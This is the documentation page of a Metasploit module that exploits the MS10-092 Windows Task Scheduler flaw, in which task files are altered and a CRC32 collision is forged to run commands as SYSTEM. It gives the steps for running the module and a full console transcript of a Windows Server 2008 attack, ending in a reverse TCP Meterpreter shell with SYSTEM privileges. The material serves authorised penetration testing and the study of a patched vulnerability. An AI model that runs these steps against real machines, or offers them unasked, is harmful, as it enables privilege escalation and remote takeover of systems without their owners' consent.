## Vulnerable Application

This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
When processing task files, the Windows Task Scheduler only uses a CRC32
checksum to validate that the file has not been tampered with. Also, In a default
configuration, normal users can read and write the task files that they have
created. By modifying the task file and creating a CRC32 collision, an attacker
can execute arbitrary commands with SYSTEM privileges.

## Verification Steps

1. Start msfconsole
2. Get a Meterpreter session
3. Do: `use modules/exploits/windows/local/ms10_092_schelevator`
4. Do: `set SESSION <session id>`
5. Do: `run`

## Options

### TASKNAME

A name for the created task (default is random)

## Scenarios

### Windows Server 2008 SP1 (x64)

```
msf6 > use exploit/windows/local/ms10_092_schelevator
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_092_schelevator) > set session 1
session => 1
msf6 exploit(windows/local/ms10_092_schelevator) > run

[*] Started reverse TCP handler on 192.168.200.130:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Preparing payload at C:\Users\user\AppData\Local\Temp\QMGmEeEmFFq.exe
[*] Creating task: qThxbR37
[*] Reading the task file contents from C:\Windows\system32\tasks\qThxbR37...
[*] Original CRC32: 0xec6cfb1d
[*] Final CRC32: 0xec6cfb1d
[*] Writing our modified content back...
[*] Validating task: qThxbR37
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "qThxbR37" have been changed.
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "qThxbR37" have been changed.
[*] Executing the task...
[*] Sending stage (200774 bytes) to 192.168.200.218
[*] Meterpreter session 2 opened (192.168.200.130:4444 -> 192.168.200.218:52347) at 2022-08-19 00:53:17 -0400
[*] Deleting task pcT2p46d0...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-17B09RRRJTG
OS              : Windows 2008 (6.0 Build 6001, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : CORP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
```
